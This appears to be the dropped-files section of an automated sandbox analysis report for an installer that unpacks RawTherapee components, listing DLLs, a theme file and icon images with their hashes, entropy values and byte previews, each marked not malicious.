                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65181
                                                                                                    Entropy (8bit):6.085572761520829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                                                    MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                                                    SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                                                    SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                                                    SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1400653
                                                                                                    Entropy (8bit):6.518664771362139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:YiyJaaUAnPfI1FO1Fm5wukMdBdfrwQAZV2R6yeYH3bhlN77S+N+RoQ8J0fnuVj1z:4aaUAnI1FOFmZkM1i2n5h++N+RCJ0fA1
                                                                                                    MD5:1124DD59526216DF405C4514949CCB54
                                                                                                    SHA1:8226C42D98B9D3C0E83A11167963D5B38B6DDD45
                                                                                                    SHA-256:A9016D40755966C547464430D3509CC3CFE9DD5D8B53F8B694B42B0D7141E5D6
                                                                                                    SHA-512:F007FBD3FBA7E3966FAF5F9D857ADB6607A99CD6FD8FFDF14E858BE6C4A0B155A9197BAA9D1DF0A28AF733F78F8A7346357EBAA7D3BD0C3934BF815CC51A930D
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........F.........#.........B... .................q.................................y........ ...................... .......................................0..t............................ ......................8................................text...............................`.P`.data...............................@.`..rdata..Tn... ...p..................@.`@/4.......c.......d...x..............@.0@.bss..................................`..edata....... ......................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc..t....0......................@.0B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15008
                                                                                                    Entropy (8bit):5.270725103917416
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:s/nUm8NYR/fiYM8LXMX5fs38Ffx4Bf0lAT9:s/nX00iY/XMXq38FxK0lq
                                                                                                    MD5:64C98ACB587FC7E4F237EADAA84A591D
                                                                                                    SHA1:B92C3D066E67FC230D56E690AE1CC21222265614
                                                                                                    SHA-256:6E8E87C68E7EFC5CCF8694042649DE3EBA01EC1DF242C22D40842AF885D1118D
                                                                                                    SHA-512:B1542C0E3D5411CD8581150FE2D81401C93686E7E43754E8BF8F78ACBEB73A041F7D9223D7DC8072C132273D1DB6EB9917ED04F9F2123C1CEA4062E59CD7F129
                                                                                                    Malicious:false
                                                                                                    Preview:#.# This file is part of RawTherapee..#.# Copyright (c) 2004-2011 Gabor Horvath <hgabor@rawtherapee.com>.#.# RawTherapee is free software: you can redistribute it and/or modify.# it under the terms of the GNU General Public License as published by.# the Free Software Foundation, either version 3 of the License, or.# (at your option) any later version..# .# RawTherapee is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with RawTherapee. If not, see <http://www.gnu.org/licenses/>..#..# Please keep this gtkrc in sync with the other ones from Clearlooks based themes...gtk-color-scheme = "rt_base_color:#ffffff\nrt_fg_color:#101010\nrt_tooltip_fg_color:#000000\nrt_selected_bg_color:#7C99AD\nrt_selected_fg_color:#ffffff\nrt_text_c
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.815385299502723
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1Aqg/ml90lvGdw1CwHTQ5NsEZxKG2mpFbp:6v/lhPW/WqgmnBdw1CFNsgdLbp
                                                                                                    MD5:CE4C02BA4708A1AAB1572A9148A94B95
                                                                                                    SHA1:E90673F72B063A610E7383EB7DAFEC7F0BD35549
                                                                                                    SHA-256:6E1332235BB51B2E29B244E5056A6C82015A5FEE79DB2D3A553CD6610DC3BB04
                                                                                                    SHA-512:902C214744235E7CA936D2B16215B63500BA980C00ADFD3773D2EFA65E12FD3EB34DA4F430024BEF2F781F762E4A938778C6AD71AF6D86A9CF02EF53C41E1233
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...PIDAT8.c`......._..........H1.....8....XIu.... ..b+..E.$..(.+. ...( .4.e@x4..G..6.g...t....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.478660891705174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXbbt8i7ltydfIxDGKuQ11iEUvWK2K1:6v/lhPW/sAXkDokflSoAkpOKtMyldp
                                                                                                    MD5:88BC92E4CF3288BA93CAF398950874CD
                                                                                                    SHA1:F1B9F2C5EF5566C5BD983B5E1B3DFF17B06412F2
                                                                                                    SHA-256:258CD3545E4E4A9CF32F31FBD1AAF19869118F2B32CC8AB88C421D53F0A63D6D
                                                                                                    SHA-512:07DCA4BFC9581F425D7BAAB13E91668A0F1C832518DE7E98C0F872A305401B68B1D1C6DB56A81CF55A81E6587DD57168AF49D5676FF24C07A0BF6B0E04FADF8B
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...!..a......I.h..y......U...,.@3:O..E!x/......Q.@..9........{..b..U.0...&HQ.5........P.W ..;......hc.3.....B.}........h..f...;l^.. *.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):206
                                                                                                    Entropy (8bit):6.093633689706192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VNtTlMGBSCghX2AGBIcDV6fr66Vp:6v/7uTVPTChXCBN8fJ7
                                                                                                    MD5:2DE4E41A0E31A4C0FBB2D7FC3CBC31CE
                                                                                                    SHA1:0704F540352C579647D28E5E7821D7CA7FCC6613
                                                                                                    SHA-256:FBEC4D0BC6ED3DFDADADFFD10EB9F04058DFC11E7248DD73814E7806E58795FA
                                                                                                    SHA-512:FE60C53AADB80B6B922E17B822710A6820046C07D2742694BDF3019DD025EB8ABF4366849BE789E122B7053D5B7798D1CEAA9A296C3D007C557D95CDFFEC0115
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME...../..v[....[IDAT8.c...?.50.A.o.../...hx)T.h.x....Lp..yI..?..D2......F.@....P1..[.....C ..4...m4A.G..F...=.G....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135
                                                                                                    Entropy (8bit):5.763983120472731
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llrAkxHgbcMktxY8ot4sUnG/QgjOD4l+dCKolkup:6v/lhPW/skd/Mktx+thzjOciCflkup
                                                                                                    MD5:C1E1CF920D57580A1337044D9244B41A
                                                                                                    SHA1:2713C8C06B08A204042B3BF92F6E31724E965E81
                                                                                                    SHA-256:8BFC445B29843719FB37F265F727D4E9E6F6C0814F054A6330C096022CA7995A
                                                                                                    SHA-512:87968296D3A160EEA1C3CE012300DF21CC59ED57ADE023B76E9238AE37F491B3F585663CBC4ED86A99EA1E3C4E392672E0CEA803A2641C9F05651E62240FF358
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...NIDAT8.c`...........(5D.....\......S.8....1D..#...QjP...A.....E^C3P....z.......g...7.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195
                                                                                                    Entropy (8bit):6.589496150082679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/YkNWoInpCU14phhk1NWMUGHgyU/Hljp:6v/7uSoIpCUKhhDMUrymlN
                                                                                                    MD5:3043F969482A1E805E6DCA44A6072881
                                                                                                    SHA1:B5764E5B1B26D11737D9307A70E14403E7063A4A
                                                                                                    SHA-256:10A3799ABAABF93F03FD86A23FAFC6C68EB04B5BFB86497F04505DF151E1177E
                                                                                                    SHA-512:3BEAAFABEEF07E3BB7E95DC6C761157C38B9B2B2BDB99C517C073AA137950BFE010C0BDFCC29E955B6A46D6BEED4AB4D8D8D1EF580DD23E8A6B0F471E1FEB4D3
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...?..A...E....F'.j....DG.U$......N.|.....r..k.d.,..$4P.)R..}.F/.h..)...Q..c.%.x.t.8.jc....).......,p.3.i.k...v.F...X....^...Y.........q.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):208
                                                                                                    Entropy (8bit):6.056729441397141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VINtlMv+YftbtCETdkth4EN0QIVp:6v/7uTVI6T6T4ENRI7
                                                                                                    MD5:3DBA17AB50E1923EB74BF395677EFA06
                                                                                                    SHA1:F293297F4127A788E07D365FD4AB5EB19C7383C4
                                                                                                    SHA-256:33BF303743432947AF7E5E4FCFE7A7FF453FCFBFA6ABDC24671071B7C205DA84
                                                                                                    SHA-512:618BFD415108DDB51B7A1D1003D5E40A417BA36F612EF6FBB5F627AE7FDA2388AC2F08F8BFBE5CF6F172DF26737773C902A85FD98DEFB0CD7DE94B3CFF77FAD6
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME.....,"E......]IDAT8.c...?.50.AT5....(1......../%. 9.._.!`19........,....5..a) ^..?)5....@|...F.<.F.h^..A..p..:.j=....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):5.703022629772099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8lli9uOgkBCvMibqMGuNGpNfodyfsiB1p:6v/lhPW/i9uOliMibqMGjAMkijp
                                                                                                    MD5:65B820457098F3E41079DB7B024D6911
                                                                                                    SHA1:2D35F7523C5F990B810FAD7E2DFB1E2E46DC94AB
                                                                                                    SHA-256:3CA8816EC6B9E88958D7D33C3532CE57223E5B3454D2AE329A54C964590034D6
                                                                                                    SHA-512:52FAD1A53340EE03016E6B63364EE937BBA8C1FCBC8F491011D707102100F9BFCBB62C5D0B9D3F40BF8CEF48E4E9566271019CBA10CD57C4ACFA05EF210DF4E8
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...GIDAT8.c`......./...0.....X.R...8..S.....(5..#.X...EQjP.4.x(.l...........g.*Uug....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):193
                                                                                                    Entropy (8bit):6.5470203907323725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/bkgGNdjs2jOTS3Bs077TxUVxhlup:6v/7uzkgG7Y2yU14lc
                                                                                                    MD5:8FB0652E37E5375EFBFFC85E000333EC
                                                                                                    SHA1:98DF46702AB67C5CFF30922BE409209CEA30A6B5
                                                                                                    SHA-256:90939B8E3B4A568724143D056A93CD7B5528D4841A9D11EA0A4B11C2A35A4E03
                                                                                                    SHA-512:EF67A9624AA003A77724CB90F456A84181746E585003B31AE714A2870FFB3B2F069382CD7DA464FDE6BA68C37A94AE42CCB58B80E0608D41EEF30A81260D5545
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...1..Q...Aa....R......h..~,...:..)..S.7.f...r.I...Rd...a...X..g<p...tBE3\.....&.rU^.WW..!FTF{.5....8b.>.1.o.,.O..........i......IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139
                                                                                                    Entropy (8bit):5.9354638900987355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll3MOgkBQTBlH/DVgPMWwnPUmLdeAkhBsF6c4V1B/0wXjp:6v/lhPW/cOlcBZKkWoLdePhq2BcwTp
                                                                                                    MD5:5EACCA1FC3A11F7E844B3809D9CAA537
                                                                                                    SHA1:86AF79F715B3921E507068558EEDC94EAAC677C6
                                                                                                    SHA-256:57A9751B8A85FD13C3F0C9EEAEB3B905D7B8802779EFE407E13444468A15C396
                                                                                                    SHA-512:997D5D631FF90CAD01D1613A347BF2C1F9D0723AF29A5CA52494BBEF97F4FA50040B171FD371F8A8FD31DDA2933EF0752ABC3056625A9DB747BC5E24EB6F7CD2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...RIDAT8.c`...........0h)._..` f....!...P9J....@.F.....;%....@,EI`..b.J....<..a.....z...l....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.807754777184353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1AqgRtKq2HYGHgsG0z4H1iBLq/bp:6v/lhPW/WqoKq24Psjz4H1ipep
                                                                                                    MD5:BDBB9972D9B7265AD10EDB04A9C2E239
                                                                                                    SHA1:DCA1CBFD90B5C644E37DBB6748227E3EB472E0C8
                                                                                                    SHA-256:866FC4117FC8B133D84C9AC96D13A37E99EBF626CEA47F0E8B059B6641FFC7C3
                                                                                                    SHA-512:BA6059567C6EF35161BD3A82D320EFB8E16435EBFF9CA851AC724A58F45726621BCF7F380DBD2A94A29B5DD919FEF294E7440B31F2B2FACC42AAA1968144020D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...PIDAT8.c`......._..)5...#.8..y(1.....\C..8.. .[.TCX.8........b...+@.Abr.Ip....2g..F.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.427379953657502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXb0oWhAm2KWmLk8vJvP+u3tKDhqcl1:6v/lhPW/sAXkDokflFoWhAmtW6k8ZUbp
                                                                                                    MD5:830FC62D759022DDBC665F1D8D2E9164
                                                                                                    SHA1:84FBC1F8F3770905AB365D465C956756FD62E15A
                                                                                                    SHA-256:0D0ED367EC6578DD5DB6A3637A5CFBF6DDEEB1CE12953C1DF09FEF8F8BD897AA
                                                                                                    SHA-512:B948DD792BC0379AFF1DB46A8ABFE5803005E3C5C1BC2F2ED382C4D5AF09DCCA7C8F98400B46B0C5CC1100CD492A8D1C3B90A5BE9B2C5EA2537DAA7911B3458C
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...!..a......I.h..y......U...,.@3:O..E!x/.~..h..f|.u.....4.]hc.3.....@.!v...!.+PC.k\=.A.....1...0A.*H.c..{.Qb..RTA..r.(P.@......;'...!\.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):220
                                                                                                    Entropy (8bit):6.113077361175645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/CsQH4dKcDA/M+DPu45sC93H5Adp:6v/7ugHcZuK45sC9X5C
                                                                                                    MD5:0BAE3C12DFF85642E6DEBB90607258F0
                                                                                                    SHA1:2B369328373C449DA154FEEC4235464F53AC27FB
                                                                                                    SHA-256:8C41C0E27B9D85D5D49BF44F00A096FA18680E85077FFEB9EC65750F1EFAAA41
                                                                                                    SHA-512:D86BAF78EECDFB96E857D1749BB0580F6230F83D54D4F4843F94EC6335AF339D22560A00907E897A9BB427200305B83056B4649321ABE0C719DDCA89549639D0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....sBIT....|.d.....pHYs...........~.....tEXtSoftware.www.inkscape.org..<....YIDAT8.c...?.50.A.. w v.. ) .....X.\...x...X..#. . ..d./ .&. . >...\.b^R..ze1.^...M... .1.....d.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1128
                                                                                                    Entropy (8bit):7.702657785044095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:CiUpjur3mHiYuZssTwiTn7JgcOc/irhx1F613aC8BLZ2cL/Fsc:CNpj23hnNTwiTPzU6t+JI4FN
                                                                                                    MD5:3F6A543B6C75ACB2EE000A3BAC7B9A59
                                                                                                    SHA1:A53275A9B4F65393301A1C787B67E87FFDA8234F
                                                                                                    SHA-256:3FACB849498CFA7CCF96BF7B02C5792C0DC49374EA7DDDC8F78E7ED53A96C72B
                                                                                                    SHA-512:E9E98AFF394E4ADAEA3C79096BD8DC865EF539D67F9E3030FEB7F4FACAACC1278606592228A19733AF99128966530CEC1363E9C6DAB6C555DFC0D8C7ADB51517
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDATX..=SSA...........G.+F....._daaaa..a.....JG+.... 7$ww=g.ws..A/n.~.>.y..+}......=%.Tn..m.....Bt.....N..'.....Z.'...........;....[.d.....~.....9.LI.?>W.........It.W..m...N...x&8>.....}....0....JoU,<X$G..m..YV......w..L...:n..FJ..!......."|.......C)........)p...)F....[.Y..{..jZ@.j.s5xv.W.|L&./.^.u..y....h..4.9b..}$..q.....".....{..p..9;.s..Ul.............^......p...d+.....u......tZ...B......d..Z.....q.....'H.}...g.jl....~a.ng...m.....mw.fp..0....,MI..v.W..7........l8.s.K..*.2....qB..|:.\[...Nje...!..L.^q.Z.hU..f..35s..hK.......R.. $.-..:.......7.p6N.i.+.....u..!RE8..L&...U+...s.x.O.s.H.U.R.E..>z.".......".DB.....9F.......h...W.<.....KH.DO.}.q.!.*....<8.c.J...A.|.S..}.d..ZL......vh....<.#.......W.i..+...m....p...8..Q......A....7..f.sk=.....!.%........tY...S.+...t.Y....1.97P!..a....a.%.m9[~I..K.?..tB.v.L&.[-.h...D...J'......Q'4...59.......I.s..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1497
                                                                                                    Entropy (8bit):7.768741056434717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqyoicsCo1Rd3ASFaaFX4FumgLpc8ut4qzrtpei0AF3BkNmhqCTEOU:eznTR3YaFXSiut4qzrtbeNmhTE7
                                                                                                    MD5:F860FF3693F12371577E33808AEA17E7
                                                                                                    SHA1:10EA223E855685506460EA8C3FC9427350CAA1E2
                                                                                                    SHA-256:B8714DCC43D031A602E3C560EBB1A07C1A892AB84E34F06EDEB03B59FEB09BD6
                                                                                                    SHA-512:6A6307796F6C6D5FEC3A0B4168DCAD5E6B15008D5CC247B562ECE25E25B87AC40ECB372038E351674FC75AB391CA23E47B8DF1966D2849DC3DD0ADFFB7CEFA62
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME......3...g...YIDATX.W.N#G.....`.......6........O&.b..@......`....J..)... ...0..Q9..n..1.LK.vwW.s...q. .x.........~.+..V...C..G.....4M.,.B.^.......w...1.}.33X....z....[,Jfgg........Z.R..'..y18@I.G....www...u...6ZYY.....w,KH.....nnn.....[\\lLLL.7..z.........$.,.3~||.......uOOO....{.........................1..XkC...}...D..M`.n..i...6dvNNN.9::........j..[.sssMX.I.........~B...`.(.....n...^]]].......hdd.k...o...rp~Lp.....%..*G.$.k4..\...6..:..._X...Yz.J0..`ll..).R..(...s... C.....J...0+x6m.A.J...X90L..~.i.H.(..?....`....|...}.......*d.>...v G.9....AR.W...H.$......H.i..?.)..<..)..Ps..<.x.....Lc........E}.,.30.5.p.........$.Et....\E...!.Fd...e......5.Q..s.I.B&.}..#.@..j.E..d..... `h=QL[..2..+..M.C.....k.s.i.I.3..+r.Z]..G|$..U..!..........{..J...T....K..e..1.e..[EY+.(T.T.<!.Y.I.....O.x.\L..^c..FHH.S........F4.f.{....S.....*eS. ..4....(...eQ.|9.....!.R4.X.+.<..!..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:GIMP XCF image data, version 0, 32 x 32, RGB Color
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3977
                                                                                                    Entropy (8bit):5.413488066014333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7dsNCv/C/CVGhkFTKfyeeocjI4Dc8oPjZ/narUX0Zwnc1ZHHdOkdsFVpAa:KcQ2Gyejc0QoPjZ/KKgwniLsFVpAa
                                                                                                    MD5:1339E8669A986ACB3CCA794EF7E67ABB
                                                                                                    SHA1:8295D74B144481F86B928D0C9A2F16AE0FF86F7C
                                                                                                    SHA-256:4D58C67A4095BE33201E16C2545B28DEF1CBA2D7690F0540877866CFC7ACE230
                                                                                                    SHA-512:DF9AA421947EF90713D0F9D2648803DDC975DB7FDB67F2941A9CA7FD489C9734081FE085C4ED4335C798A05CE2028D84C22A4948C558FDCBE86593CFEBB6A796
                                                                                                    Malicious:false
                                                                                                    Preview:gimp xcf file.... ... .....................B...B..............?........................gimp-image-grid.........(style solid).(fgcolor (color-rgba 0.000000 0.000000 0.000000 1.000000)).(bgcolor (color-rgba 1.000000 1.000000 1.000000 1.000000)).(xspacing 10.000000).(yspacing 10.000000).(spacing-unit inches).(xoffset 0.000000).(yoffset 0.000000).(offset-unit inches).................................5........... ... ........New Layer............l...............................................................................................................+...........=....... ... .......Q....... ... ...a....E...............................#.E...............................#.E...............................#.E.............Vq.q.W......?......?......8......8..............#.... ... ........New Layer#4............................................................................................................................'................... ... ............... ... .........................."..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1442
                                                                                                    Entropy (8bit):7.754161124979248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oq2vym+9kVWUOASjz39hd/9uinkxIyJubx/98nDDJFPyvfCDFHTCyFm+3wTf8f4C:aqmzV9az39z9hnkx+2DfyyD9TFAAwTfI
                                                                                                    MD5:46934D3CAA685BB0DBECF20BAB8BC317
                                                                                                    SHA1:DD61BF668D265AB3FBB61C6CB6CF25778632154F
                                                                                                    SHA-256:AC57AEA1D66661974EA2922733661B27D26D3C2026321E77A2A9ACE1CDAD558C
                                                                                                    SHA-512:BCB6D969F8823196652B4093988719C9F51940890D212A0E743CC887C46BE3DAD00D95B47970F1E682F3A40E7F7216EBFD4B37626AE130FE57F7F3CEBA718AE4
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME.......E......"IDATX.W.J,W....jm.A#>AA$......$....q.....!B.Cp..;1...p((...G=.Vyve...+...>g._....q.:..[__/.--}.....w..X.s.....y...N.EN..9.<koo.smmmknn...!V.b...OOO.8==....'........;;;}...}z..+.....vrr.8<<.........._....755.............r___G[[[+....%...z...\..T*..........Ay|||.........O...w......._utt..D{.T*.......1H..;.Z-......u......?........../....J.......m....F.=D+Rk.....PP.\..Ix....Z?;;.666...}.xW.{Z\...j....c...X1..zm.>..y.!...S.u.....o=l..n..._.f....R..P.."....~..8......l..`.;..B\........>.A...7..Q.F..4..=./.B.......eY..$.<..r....A..$.$.<.`)...........C...V...8.......^.....D&........r..Y9.K.....8..C.....%.UV;*....^. .d.....v. ......M...X..M..zR...H...'..'._dS..P.?..2S.MT......4$.....k...=.eL.^z.....X.e+.......$..sG..qm.vB.........&..I..+W....Q. ,.M.+.-Q..$<!.t....wi.rA..(v.kW..&.p.-.(..u+.j.5.y.....2N.....0....kW....5.y).J1. xDW...x..0.d.p.\S.d......l
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1555
                                                                                                    Entropy (8bit):7.796645823149652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqhLS0rCCBSazjoXK2RM1EpIuNF0piVLDlZLfciK3ZCHBJW:VjrBBSFXKP1ECuNF0piVLDlBfcOM
                                                                                                    MD5:486390A2CE5B4CC1393AC254780A7C7C
                                                                                                    SHA1:4305181EC1910A666A47C3715D27F5CA6991D688
                                                                                                    SHA-256:AB3BDFDFEED5743FD4AF47B0BA6AAAD914661DCE381A6FF8C8C8994363F83909
                                                                                                    SHA-512:F3F6051BA679C6F329A18E97F12CB6FFD9ED18D0F054C79ED9F2FB5D23F0484A12DB0FD16CD47F52B67E3D617F9BE728F9BECC850CF6A61FE9B74ED9701C2DD1
                                                                                                    Malicious:false
